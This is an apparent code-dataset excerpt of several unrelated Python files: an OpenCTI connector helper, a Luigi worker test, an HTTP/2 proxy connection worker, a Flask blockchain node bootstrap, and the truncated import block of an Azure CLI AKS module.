source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
opencti_connector_helper.py
|
import datetime
import threading
import pika
import logging
import json
import time
import base64
import uuid
import os
from typing import Callable, Dict, List
from pika.exceptions import UnroutableError, NackError
from pycti.api.opencti_api_client import OpenCTIApiClient
from pycti.connector.opencti_connector import OpenCTIConnector
def get_config_variable(envvar, yaml_path, config={}, isNumber=False):
if os.getenv(envvar) is not None:
result = os.getenv(envvar)
elif yaml_path is not None:
if yaml_path[0] in config and yaml_path[1] in config[yaml_path[0]]:
result = config[yaml_path[0]][yaml_path[1]]
else:
return None
else:
return None
if result == "yes" or result == "true" or result == "True":
return True
elif result == "no" or result == "false" or result == "False":
return False
elif isNumber:
return int(result)
else:
return result
class ListenQueue(threading.Thread):
def __init__(self, helper, config, callback):
threading.Thread.__init__(self)
self.pika_connection = None
self.channel = None
self.helper = helper
self.callback = callback
self.uri = config["uri"]
self.queue_name = config["listen"]
# noinspection PyUnusedLocal
def _process_message(self, channel, method, properties, body):
json_data = json.loads(body)
thread = threading.Thread(target=self._data_handler, args=[json_data])
thread.start()
while thread.is_alive(): # Loop while the thread is processing
self.pika_connection.sleep(1.0)
logging.info(
"Message (delivery_tag="
+ str(method.delivery_tag)
+ ") processed, thread terminated"
)
channel.basic_ack(delivery_tag=method.delivery_tag)
def _data_handler(self, json_data):
job_id = json_data["job_id"] if "job_id" in json_data else None
try:
work_id = json_data["work_id"]
self.helper.current_work_id = work_id
self.helper.api.job.update_job(job_id, "progress", ["Starting process"])
messages = self.callback(json_data)
self.helper.api.job.update_job(job_id, "complete", messages)
except Exception as e:
logging.exception("Error in message processing, reporting error to API")
try:
self.helper.api.job.update_job(job_id, "error", [str(e)])
except:
logging.error("Failing reporting the processing")
def run(self):
while True:
try:
# Connect the broker
self.pika_connection = pika.BlockingConnection(
pika.URLParameters(self.uri)
)
self.channel = self.pika_connection.channel()
self.channel.basic_consume(
queue=self.queue_name, on_message_callback=self._process_message
)
self.channel.start_consuming()
except (KeyboardInterrupt, SystemExit):
self.helper.log_info("Connector stop")
exit(0)
except Exception as e:
self.helper.log_error(str(e))
time.sleep(10)
class PingAlive(threading.Thread):
def __init__(self, connector_id, api, get_state, set_state):
threading.Thread.__init__(self)
self.connector_id = connector_id
self.in_error = False
self.api = api
self.get_state = get_state
self.set_state = set_state
def ping(self):
while True:
try:
initial_state = self.get_state()
result = self.api.connector.ping(self.connector_id, initial_state)
remote_state = (
json.loads(result["connector_state"])
if len(result["connector_state"]) > 0
else None
)
if initial_state != remote_state:
self.set_state(result["connector_state"])
logging.info(
'Connector state has been remotely reset to: "'
+ self.get_state()
+ '"'
)
if self.in_error:
self.in_error = False
logging.error("API Ping back to normal")
except Exception:
self.in_error = True
logging.error("Error pinging the API")
time.sleep(40)
def run(self):
logging.info("Starting ping alive thread")
self.ping()
class OpenCTIConnectorHelper:
"""
Python API for OpenCTI connector
:param config: Dict standard config
"""
def __init__(self, config: dict):
# Load API config
self.opencti_url = get_config_variable(
"OPENCTI_URL", ["opencti", "url"], config
)
self.opencti_token = get_config_variable(
"OPENCTI_TOKEN", ["opencti", "token"], config
)
# Load connector config
self.connect_id = get_config_variable(
"CONNECTOR_ID", ["connector", "id"], config
)
self.connect_type = get_config_variable(
"CONNECTOR_TYPE", ["connector", "type"], config
)
self.connect_name = get_config_variable(
"CONNECTOR_NAME", ["connector", "name"], config
)
self.connect_confidence_level = get_config_variable(
"CONNECTOR_CONFIDENCE_LEVEL",
["connector", "confidence_level"],
config,
True,
)
self.connect_scope = get_config_variable(
"CONNECTOR_SCOPE", ["connector", "scope"], config
)
self.log_level = get_config_variable(
"CONNECTOR_LOG_LEVEL", ["connector", "log_level"], config
)
# Configure logger
numeric_level = getattr(logging, self.log_level.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError("Invalid log level: " + self.log_level)
logging.basicConfig(level=numeric_level)
# Initialize configuration
self.api = OpenCTIApiClient(
self.opencti_url, self.opencti_token, self.log_level
)
self.current_work_id = None
# Register the connector in OpenCTI
self.connector = OpenCTIConnector(
self.connect_id, self.connect_name, self.connect_type, self.connect_scope
)
connector_configuration = self.api.connector.register(self.connector)
self.connector_id = connector_configuration["id"]
self.connector_state = connector_configuration["connector_state"]
self.config = connector_configuration["config"]
# Start ping thread
self.ping = PingAlive(
self.connector.id, self.api, self.get_state, self.set_state
)
self.ping.start()
# Initialize caching
self.cache_index = {}
self.cache_added = []
def set_state(self, state) -> None:
self.connector_state = json.dumps(state)
def get_state(self):
try:
return (
None
if self.connector_state is None
else json.loads(self.connector_state)
)
except:
return None
def listen(self, message_callback: Callable[[Dict], List[str]]) -> None:
listen_queue = ListenQueue(self, self.config, message_callback)
listen_queue.start()
def get_connector(self):
return self.connector
def log_error(self, msg):
logging.error(msg)
def log_info(self, msg):
logging.info(msg)
def date_now(self):
return (
datetime.datetime.utcnow()
.replace(microsecond=0, tzinfo=datetime.timezone.utc)
.isoformat()
)
# Push Stix2 helper
def send_stix2_bundle(self, bundle, entities_types=None, update=False, split=True):
if entities_types is None:
entities_types = []
if split:
bundles = self.split_stix2_bundle(bundle)
if len(bundles) == 0:
raise ValueError("Nothing to import")
pika_connection = pika.BlockingConnection(
pika.URLParameters(self.config["uri"])
)
channel = pika_connection.channel()
for bundle in bundles:
self._send_bundle(channel, bundle, entities_types, update)
channel.close()
return bundles
else:
pika_connection = pika.BlockingConnection(
pika.URLParameters(self.config["uri"])
)
channel = pika_connection.channel()
self._send_bundle(channel, bundle, entities_types, update)
channel.close()
return [bundle]
def _send_bundle(self, channel, bundle, entities_types=None, update=False):
"""
This method send a STIX2 bundle to RabbitMQ to be consumed by workers
:param bundle: A valid STIX2 bundle
:param entities_types: Entities types to ingest
"""
if entities_types is None:
entities_types = []
# Create a job log expectation
if self.current_work_id is not None:
job_id = self.api.job.initiate_job(self.current_work_id)
else:
job_id = None
# Validate the STIX 2 bundle
# validation = validate_string(bundle)
# if not validation.is_valid:
# raise ValueError('The bundle is not a valid STIX2 JSON')
# Prepare the message
# if self.current_work_id is None:
# raise ValueError('The job id must be specified')
message = {
"job_id": job_id,
"entities_types": entities_types,
"update": update,
"content": base64.b64encode(bundle.encode("utf-8")).decode("utf-8"),
}
# Send the message
try:
routing_key = "push_routing_" + self.connector_id
channel.basic_publish(
self.config["push_exchange"], routing_key, json.dumps(message)
)
logging.info("Bundle has been sent")
except (UnroutableError, NackError) as e:
logging.error("Unable to send bundle, retry...", e)
self._send_bundle(bundle, entities_types)
def split_stix2_bundle(self, bundle):
self.cache_index = {}
self.cache_added = []
try:
bundle_data = json.loads(bundle)
except:
raise Exception("File data is not a valid JSON")
# validation = validate_parsed_json(bundle_data)
# if not validation.is_valid:
# raise ValueError('The bundle is not a valid STIX2 JSON:' + bundle)
# Index all objects by id
for item in bundle_data["objects"]:
self.cache_index[item["id"]] = item
bundles = []
# Reports must be handled because of object_refs
for item in bundle_data["objects"]:
if item["type"] == "report":
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_report_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
# Relationships not added in previous reports
for item in bundle_data["objects"]:
if item["type"] == "relationship" and item["id"] not in self.cache_added:
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_relationship_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
# Entities not added in previous reports and relationships
for item in bundle_data["objects"]:
if item["type"] != "relationship" and item["id"] not in self.cache_added:
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_entity_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
return bundles
def stix2_get_embedded_objects(self, item):
# Marking definitions
object_marking_refs = []
if "object_marking_refs" in item:
for object_marking_ref in item["object_marking_refs"]:
if object_marking_ref in self.cache_index:
object_marking_refs.append(self.cache_index[object_marking_ref])
# Created by ref
created_by_ref = None
if "created_by_ref" in item and item["created_by_ref"] in self.cache_index:
created_by_ref = self.cache_index[item["created_by_ref"]]
return {
"object_marking_refs": object_marking_refs,
"created_by_ref": created_by_ref,
}
def stix2_get_entity_objects(self, entity):
items = [entity]
# Get embedded objects
embedded_objects = self.stix2_get_embedded_objects(entity)
# Add created by ref
if embedded_objects["created_by_ref"] is not None:
items.append(embedded_objects["created_by_ref"])
# Add marking definitions
if len(embedded_objects["object_marking_refs"]) > 0:
items = items + embedded_objects["object_marking_refs"]
return items
def stix2_get_relationship_objects(self, relationship):
items = [relationship]
# Get source ref
if relationship["source_ref"] in self.cache_index:
items.append(self.cache_index[relationship["source_ref"]])
# Get target ref
if relationship["target_ref"] in self.cache_index:
items.append(self.cache_index[relationship["target_ref"]])
# Get embedded objects
embedded_objects = self.stix2_get_embedded_objects(relationship)
# Add created by ref
if embedded_objects["created_by_ref"] is not None:
items.append(embedded_objects["created_by_ref"])
# Add marking definitions
if len(embedded_objects["object_marking_refs"]) > 0:
items = items + embedded_objects["object_marking_refs"]
return items
def stix2_get_report_objects(self, report):
items = [report]
# Add all object refs
for object_ref in report["object_refs"]:
items.append(self.cache_index[object_ref])
for item in items:
if item["type"] == "relationship":
items = items + self.stix2_get_relationship_objects(item)
else:
items = items + self.stix2_get_entity_objects(item)
return items
@staticmethod
def stix2_deduplicate_objects(items):
ids = []
final_items = []
for item in items:
if item["id"] not in ids:
final_items.append(item)
ids.append(item["id"])
return final_items
@staticmethod
def stix2_create_bundle(items):
bundle = {
"type": "bundle",
"id": "bundle--" + str(uuid.uuid4()),
"spec_version": "2.0",
"objects": items,
}
return json.dumps(bundle)
@staticmethod
def check_max_tlp(tlp, max_tlp):
allowed_tlps = ["TLP:WHITE"]
if max_tlp == "TLP:RED":
allowed_tlps = ["TLP:WHITE", "TLP:GREEN", "TLP:AMBER", "TLP:RED"]
elif max_tlp == "TLP:AMBER":
allowed_tlps = ["TLP:WHITE", "TLP:GREEN", "TLP:AMBER"]
elif max_tlp == "TLP:GREEN":
allowed_tlps = ["TLP:WHITE", "TLP:GREEN"]
return tlp in allowed_tlps
|
worker_keep_alive_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2016 VNG Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from helpers import LuigiTestCase
from luigi.scheduler import Scheduler
from luigi.worker import Worker
import luigi
import threading
class WorkerKeepAliveUpstreamTest(LuigiTestCase):
"""
Tests related to how the worker stays alive after upstream status changes.
See https://github.com/spotify/luigi/pull/1789
"""
def run(self, result=None):
"""
Common setup code. Due to the contextmanager cant use normal setup
"""
self.sch = Scheduler(retry_delay=0.00000001, retry_count=2)
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0) as w:
self.w = w
super(WorkerKeepAliveUpstreamTest, self).run(result)
def test_alive_while_has_failure(self):
"""
One dependency disables and one fails
"""
class Disabler(luigi.Task):
pass
class Failer(luigi.Task):
did_run = False
def run(self):
self.did_run = True
class Wrapper(luigi.WrapperTask):
def requires(self):
return (Disabler(), Failer())
self.w.add(Wrapper())
disabler = Disabler().task_id
failer = Failer().task_id
self.sch.add_task(disabler, 'FAILED', worker='X')
self.sch.prune() # Make scheduler unfail the disabled task
self.sch.add_task(disabler, 'FAILED', worker='X') # Disable it
self.sch.add_task(failer, 'FAILED', worker='X') # Fail it
try:
t = threading.Thread(target=self.w.run)
t.start()
t.join(timeout=1) # Wait 1 second
self.assertTrue(t.is_alive()) # It shouldn't stop trying, the failed task should be retried!
self.assertFalse(Failer.did_run) # It should never have run, the cooldown is longer than a second.
finally:
self.sch.prune() # Make it, like die. Couldn't find a more forceful way to do this.
t.join(timeout=1) # Wait 1 second
assert not t.is_alive()
def test_alive_while_has_success(self):
"""
One dependency disables and one succeeds
"""
# TODO: Fix copy paste mess
class Disabler(luigi.Task):
pass
class Succeeder(luigi.Task):
did_run = False
def run(self):
self.did_run = True
class Wrapper(luigi.WrapperTask):
def requires(self):
return (Disabler(), Succeeder())
self.w.add(Wrapper())
disabler = Disabler().task_id
succeeder = Succeeder().task_id
self.sch.add_task(disabler, 'FAILED', worker='X')
self.sch.prune() # Make scheduler unfail the disabled task
self.sch.add_task(disabler, 'FAILED', worker='X') # Disable it
self.sch.add_task(succeeder, 'DONE', worker='X') # Fail it
try:
t = threading.Thread(target=self.w.run)
t.start()
t.join(timeout=1) # Wait 1 second
self.assertFalse(t.is_alive()) # The worker should think that it should stop ...
# ... because in this case the only work remaining depends on DISABLED tasks,
# hence it's not worth considering the wrapper task as a PENDING task to
# keep the worker alive anymore.
self.assertFalse(Succeeder.did_run) # It should never have run, it suceeded already
finally:
self.sch.prune() # This shouldnt be necessary in this version, but whatevs
t.join(timeout=1) # Wait 1 second
assert not t.is_alive()
|
http2_connection.py
|
import Queue
import threading
import socket
import errno
import struct
from xlog import getLogger
xlog = getLogger("gae_proxy")
import connect_control
from http_common import *
from hyper.common.bufsocket import BufferedSocket
from hyper.common.bufsocket import BufferedSocket
from hyper.packages.hyperframe.frame import (
FRAMES, DataFrame, HeadersFrame, PushPromiseFrame, RstStreamFrame,
SettingsFrame, Frame, WindowUpdateFrame, GoAwayFrame, PingFrame,
BlockedFrame, FRAME_MAX_ALLOWED_LEN, FRAME_MAX_LEN
)
from hyper.packages.hpack.hpack_compat import Encoder, Decoder
from http2_stream import Stream
from hyper.http20.window import BaseFlowControlManager
# this is defined in rfc7540
# default window size 64k
DEFAULT_WINDOW_SIZE = 65535
# default max frame is 16k, defined in rfc7540
DEFAULT_MAX_FRAME = FRAME_MAX_LEN
class FlowControlManager(BaseFlowControlManager):
"""
``hyper``'s default flow control manager.
This implements hyper's flow control algorithms. This algorithm attempts to
reduce the number of WINDOWUPDATE frames we send without blocking the remote
endpoint behind the flow control window.
This algorithm will become more complicated over time. In the current form,
the algorithm is very simple:
- When the flow control window gets less than 3/4 of the maximum size,
increment back to the maximum.
- Otherwise, if the flow control window gets to less than 1kB, increment
back to the maximum.
"""
def increase_window_size(self, frame_size):
future_window_size = self.window_size - frame_size
if ((future_window_size < (self.initial_window_size * 3 / 4)) or
(future_window_size < 1000)):
return self.initial_window_size - future_window_size
return 0
def blocked(self):
return self.initial_window_size - self.window_size
class HTTP2_worker(HTTP_worker):
version = "2"
def __init__(self, ssl_sock, close_cb, retry_task_cb):
super(HTTP2_worker, self).__init__(ssl_sock, close_cb, retry_task_cb)
self.max_concurrent = 20
self.network_buffer_size = 128 * 1024
# Google http/2 time out is 4 mins.
ssl_sock.settimeout(240)
self._sock = BufferedSocket(ssl_sock, self.network_buffer_size)
self.next_stream_id = 1
self.streams = {}
self.last_ping_time = time.time()
# count ping not ACK
# increase when send ping
# decrease when recv ping ack
# if this in not 0, don't accept request.
self.ping_on_way = 0
# request_lock
self.request_lock = threading.Lock()
# all send frame must put to this queue
# then send by send_loop
# every frame put to this queue must allowed by stream window and connection window
# any data frame blocked by connection window should put to self.blocked_send_frames
self.send_queue = Queue.Queue()
# keep blocked data frame in this buffer
# which is allowed by stream window but blocked by connection window.
# They will be sent when connection window open
self.blocked_send_frames = []
self.encoder = Encoder()
self.decoder = Decoder()
# Values for the settings used on an HTTP/2 connection.
# will send to remote using Setting Frame
self.local_settings = {
SettingsFrame.INITIAL_WINDOW_SIZE: 1 * 1024 * 1024,
SettingsFrame.SETTINGS_MAX_FRAME_SIZE: 256 * 1024
}
self.local_connection_initial_windows = 2 * 1024 * 1024
self.local_window_manager = FlowControlManager(self.local_connection_initial_windows)
# changed by server, with SettingFrame
self.remote_settings = {
SettingsFrame.INITIAL_WINDOW_SIZE: DEFAULT_WINDOW_SIZE,
SettingsFrame.SETTINGS_MAX_FRAME_SIZE: DEFAULT_MAX_FRAME,
SettingsFrame.MAX_CONCURRENT_STREAMS: 100
}
self.remote_window_size = DEFAULT_WINDOW_SIZE
# send Setting frame before accept task.
self._send_preamble()
threading.Thread(target=self.send_loop).start()
threading.Thread(target=self.recv_loop).start()
def request(self, task):
# this is the export api
if len(self.streams) > self.max_concurrent:
self.accept_task = False
task.set_state("h2_req")
self.request_task(task)
def request_task(self, task):
with self.request_lock:
# create stream to process task
stream_id = self.next_stream_id
# http/2 client use odd stream_id
self.next_stream_id += 2
stream = Stream(self, self.ip, stream_id, self.ssl_sock.host, task,
self._send_cb, self._close_stream_cb, self.encoder, self.decoder,
FlowControlManager(self.local_settings[SettingsFrame.INITIAL_WINDOW_SIZE]),
self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE],
self.remote_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE])
self.streams[stream_id] = stream
def send_loop(self):
while connect_control.keep_running and self.keep_running:
frame = self.send_queue.get(True)
if not frame:
# None frame to exist
break
# xlog.debug("%s Send:%s", self.ip, str(frame))
data = frame.serialize()
try:
self._sock.send(data, flush=False)
# don't flush for small package
# reduce send api call
# wait for payload frame
time.sleep(0.001)
# combine header and payload in one tcp package.
if not self.send_queue._qsize():
self._sock.flush()
except socket.error as e:
if e.errno not in (errno.EPIPE, errno.ECONNRESET):
xlog.warn("%s http2 send fail:%r", self.ip, e)
else:
xlog.exceptiong("send error:%r", e)
self.close("send fail:%r", e)
def recv_loop(self):
while connect_control.keep_running and self.keep_running:
try:
self._consume_single_frame()
except Exception as e:
xlog.debug("recv fail:%r", e)
self.close("recv fail:%r" % e)
def get_rtt_rate(self):
return self.rtt + len(self.streams) * 100
def close(self, reason=""):
self.keep_running = False
# Notify loop to exit
# This function may be call by out side http2
# When gae_proxy found the appid or ip is wrong
self.send_queue.put(None)
for stream in self.streams.values():
if stream.get_head_time:
# after get header,
# response have send to client
# can't retry
stream.close(reason=reason)
else:
self.retry_task_cb(stream.task)
super(HTTP2_worker, self).close(reason)
def send_ping(self):
p = PingFrame(0)
p.opaque_data = struct.pack("!d", time.time())
self.send_queue.put(p)
self.last_ping_time = time.time()
self.ping_on_way += 1
def _send_preamble(self):
self._sock.send(b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n')
f = SettingsFrame(0)
f.settings[SettingsFrame.ENABLE_PUSH] = 0
f.settings[SettingsFrame.INITIAL_WINDOW_SIZE] = self.local_settings[SettingsFrame.INITIAL_WINDOW_SIZE]
f.settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE] = self.local_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE]
self._send_cb(f)
# update local connection windows size
f = WindowUpdateFrame(0)
f.window_increment = self.local_connection_initial_windows - DEFAULT_WINDOW_SIZE
self._send_cb(f)
def increase_remote_window_size(self, inc_size):
# check and send blocked frames if window allow
self.remote_window_size += inc_size
#xlog.debug("%s increase send win:%d result:%d", self.ip, inc_size, self.remote_window_size)
while len(self.blocked_send_frames):
frame = self.blocked_send_frames[0]
if len(frame.data) > self.remote_window_size:
return
self.remote_window_size -= len(frame.data)
self.send_queue.put(frame)
self.blocked_send_frames.pop(0)
def _send_cb(self, frame):
# can called by stream
# put to send_blocked if connection window not allow,
if frame.type == DataFrame.type:
if len(frame.data) > self.remote_window_size:
self.blocked_send_frames.append(frame)
self.accept_task = False
return
else:
self.remote_window_size -= len(frame.data)
self.send_queue.put(frame)
else:
self.send_queue.put(frame)
def _close_stream_cb(self, stream_id, reason):
# call by stream to remove from streams list
#xlog.debug("%s close stream:%d %s", self.ssl_sock.ip, stream_id, reason)
try:
del self.streams[stream_id]
except KeyError:
pass
if self.keep_running and len(self.streams) < self.max_concurrent and self.remote_window_size > 10000:
self.accept_task = True
self.processed_tasks += 1
def _consume_single_frame(self):
try:
header = self._sock.recv(9)
except Exception as e:
xlog.warn("%s _consume_single_frame:%r", self.ip, e)
self.close("disconnect:%r" % e)
return
# Parse the header. We can use the returned memoryview directly here.
frame, length = Frame.parse_frame_header(header)
if length > FRAME_MAX_LEN:
xlog.error("Frame size exceeded on stream %d (received: %d, max: %d)",
frame.stream_id, length, FRAME_MAX_LEN)
# self._send_rst_frame(frame.stream_id, 6) # 6 = FRAME_SIZE_ERROR
data = self._recv_payload(length)
self._consume_frame_payload(frame, data)
def _recv_payload(self, length):
if not length:
return memoryview(b'')
buffer = bytearray(length)
buffer_view = memoryview(buffer)
index = 0
data_length = -1
# _sock.recv(length) might not read out all data if the given length
# is very large. So it should be to retrieve from socket repeatedly.
while length and data_length:
data = self._sock.recv(length)
data_length = len(data)
end = index + data_length
buffer_view[index:end] = data[:]
length -= data_length
index = end
return buffer_view[:end]
def _consume_frame_payload(self, frame, data):
frame.parse_body(data)
# xlog.debug("%s Recv:%s", self.ip, str(frame))
# Maintain our flow control window. We do this by delegating to the
# chosen WindowManager.
if frame.type == DataFrame.type:
size = frame.flow_controlled_length
increment = self.local_window_manager._handle_frame(size)
if increment:
#xlog.debug("%s frame size:%d increase win:%d", self.ip, size, increment)
w = WindowUpdateFrame(0)
w.window_increment = increment
self._send_cb(w)
elif frame.type == PushPromiseFrame.type:
xlog.error("%s receive push frame", self.ip,)
# Work out to whom this frame should go.
if frame.stream_id != 0:
try:
self.streams[frame.stream_id].receive_frame(frame)
except KeyError:
xlog.error("%s Unexpected stream identifier %d", self.ip, frame.stream_id)
else:
self.receive_frame(frame)
def receive_frame(self, frame):
if frame.type == WindowUpdateFrame.type:
self.increase_remote_window_size(frame.window_increment)
elif frame.type == PingFrame.type:
if 'ACK' in frame.flags:
ping_time = struct.unpack("!d", frame.opaque_data)[0]
time_now = time.time()
rtt = (time_now - ping_time) * 1000
if rtt < 0:
xlog.error("rtt:%f ping_time:%f now:%f", rtt, ping_time, time_now)
self.rtt = rtt
self.ping_on_way -= 1
#xlog.debug("RTT:%d, on_way:%d", self.rtt, self.ping_on_way)
if self.keep_running and self.ping_on_way == 0:
self.accept_task = True
else:
# The spec requires us to reply with PING+ACK and identical data.
p = PingFrame(0)
p.flags.add('ACK')
p.opaque_data = frame.opaque_data
self._send_cb(p)
elif frame.type == SettingsFrame.type:
if 'ACK' not in frame.flags:
# send ACK as soon as possible
f = SettingsFrame(0)
f.flags.add('ACK')
self._send_cb(f)
# this may trigger send DataFrame blocked by remote window
self._update_settings(frame)
elif frame.type == GoAwayFrame.type:
# If we get GoAway with error code zero, we are doing a graceful
# shutdown and all is well. Otherwise, throw an exception.
# If an error occured, try to read the error description from
# code registry otherwise use the frame's additional data.
error_string = frame._extra_info()
if frame.additional_data != "session_timed_out":
xlog.warn("goaway:%s", error_string)
self.close("GoAway:%s" % error_string)
elif frame.type == BlockedFrame.type:
xlog.warn("%s get BlockedFrame", self.ip)
elif frame.type in FRAMES:
# This frame isn't valid at this point.
#raise ValueError("Unexpected frame %s." % frame)
xlog.error("%s Unexpected frame %s.", self.ip, frame)
else: # pragma: no cover
# Unexpected frames belong to extensions. Just drop it on the
# floor, but log so that users know that something happened.
xlog.error("%s Received unknown frame, type %d", self.ip, frame.type)
def _update_settings(self, frame):
if SettingsFrame.HEADER_TABLE_SIZE in frame.settings:
new_size = frame.settings[SettingsFrame.HEADER_TABLE_SIZE]
self.remote_settings[SettingsFrame.HEADER_TABLE_SIZE] = new_size
self.encoder.header_table_size = new_size
if SettingsFrame.INITIAL_WINDOW_SIZE in frame.settings:
newsize = frame.settings[SettingsFrame.INITIAL_WINDOW_SIZE]
oldsize = self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE]
delta = newsize - oldsize
for stream in self.streams.values():
stream.remote_window_size += delta
self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE] = newsize
if SettingsFrame.SETTINGS_MAX_FRAME_SIZE in frame.settings:
new_size = frame.settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE]
if not (FRAME_MAX_LEN <= new_size <= FRAME_MAX_ALLOWED_LEN):
xlog.error("%s Frame size %d is outside of allowed range", self.ip, new_size)
# Tear the connection down with error code PROTOCOL_ERROR
self.close("bad max frame size")
#error_string = ("Advertised frame size %d is outside of range" % (new_size))
#raise ConnectionError(error_string)
return
self.remote_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE] = new_size
for stream in self.streams.values():
stream.max_frame_size += new_size
|
rest.py
|
import time
import socket
import requests
import threading
import config
import endpoints
import block
from flask_cors import CORS
from argparse import ArgumentParser
from flask import Flask, jsonify, request, render_template
from block import Block
from transaction import Transaction
from endpoints import node, rest_api
# All nodes are aware of the ip and the port of the bootstrap
# node, in order to communicate with it when entering the network.
BOOTSTRAP_IP = config.BOOTSTRAP_IP
BOOTSTRAP_PORT = config.BOOTSTRAP_PORT
# Get the IP address of the device.
if config.LOCAL:
IPAddr = BOOTSTRAP_IP
else:
hostname = socket.gethostname()
IPAddr = socket.gethostbyname(hostname)
# Define the flask environment and register the blueprint with the endpoints.
app = Flask(__name__)
app.register_blueprint(rest_api)
CORS(app)
if __name__ == '__main__':
# Define the argument parser.
parser = ArgumentParser(description='Rest api of noobcash.')
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional_arguments')
required.add_argument(
'-p', type=int, help='port to listen on', required=True)
required.add_argument(
'-n', type=int, help='number of nodes in the blockchain', required=True)
required.add_argument('-capacity', type=int,
help='capacity of a block', required=True)
optional.add_argument('-bootstrap', action='store_true',
help='set if the current node is the bootstrap')
# Parse the given arguments.
args = parser.parse_args()
port = args.p
endpoints.n = args.n
node.capacity = args.capacity
is_bootstrap = args.bootstrap
if (is_bootstrap):
"""
The bootstrap node (id = 0):
- registers itself in the ring.
- creates the genesis block.
- creates the first transaction and adds it in the genesis block.
- adds the genesis block in the blockchain (no validation).
- starts listening in the desired port.
"""
node.id = 0
node.register_node_to_ring(
node.id, BOOTSTRAP_IP, BOOTSTRAP_PORT, node.wallet.public_key, 100 * endpoints.n)
# Defines the genesis block.
gen_block = node.create_new_block()
gen_block.nonce = 0
# Adds the first and only transaction in the genesis block.
first_transaction = Transaction(
sender_address="0", sender_id='0', receiver_address=node.wallet.public_key, receiver_id=node.id, amount=100 * endpoints.n, transaction_inputs=None, nbc_sent=100 * endpoints.n)
gen_block.transactions.append(first_transaction)
gen_block.current_hash = gen_block.get_hash()
node.wallet.transactions.append(first_transaction)
# Add the genesis block in the chain.
node.chain.blocks.append(gen_block)
node.current_block = None
# Listen in the specified address (ip:port)
app.run(host=BOOTSTRAP_IP, port=BOOTSTRAP_PORT)
else:
"""
The rest nodes (id = 1, .., n-1):
- communicate with the bootstrap node in order to register them.
- starts listening in the desired port.
"""
register_address = 'http://' + BOOTSTRAP_IP + \
':' + BOOTSTRAP_PORT + '/register_node'
def thread_function():
time.sleep(2)
response = requests.post(
register_address,
data={'public_key': node.wallet.public_key,
'ip': IPAddr, 'port': port}
)
if response.status_code == 200:
print("Node initialized")
node.id = response.json()['id']
req = threading.Thread(target=thread_function, args=())
req.start()
# Listen in the specified address (ip:port)
app.run(host=IPAddr, port=port)
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import io
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
import zipfile
from distutils.version import StrictVersion
from urllib.error import URLError
from urllib.request import urlopen
import colorama
import dateutil.parser
import requests
import yaml
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_container_services,
get_auth_management_client,
get_graph_rbac_management_client,
get_resource_by_name,
)
from azure.cli.command_modules.acs._consts import (
ADDONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_ACR_DOMAIN_NAME,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_CANIPULL_IMAGE,
CONST_CONFCOM_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_NODEPOOL_MODE_USER,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
DecoratorEarlyExitException,
)
from azure.cli.command_modules.acs._helpers import get_snapshot_by_snapshot_id
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.command_modules.acs._resourcegroup import get_rg_location
from azure.cli.command_modules.acs._validators import extract_comma_separated_string
from azure.cli.command_modules.acs.addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
)
